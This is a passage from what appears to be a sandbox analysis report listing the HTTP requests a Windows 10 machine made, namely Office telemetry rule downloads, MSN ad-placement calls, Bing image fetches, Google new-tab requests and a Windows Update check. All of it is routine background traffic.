Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060918Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=de2ef3e94b90417eab98371b009a50e8&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-280815&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060918Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ef23dd4ecda947f5828854712e5a4867&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338388&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=531098720&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060918Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=eefd359bfb4241cb9a7c4cc840b0b3bd&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338387&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=530911393,530840334,530725852&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639703_1XZVEAKL3PD7EZGL4&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639702_1LY06F7YB2ZF9D3G5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239357296555_1NQZO136EN197N4N8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239357296561_1OO0GI7LQYW9WHHBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639595_1MX6CE6U5QJ1LNKB2&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639606_1UY6VCV79VNDR5KH5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UwR+YbHaZNrmG2l&MD=KeOoTvEV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239317301209_1YG8XJG78E6WL3S49&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239317301618_18EK60OU3ULIWMD9V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239340418545_11VT5XTZM3TEDIRSP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060928Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3bf9bbbc2de44c6b9f61e0465d163fe5&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-88000045&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: 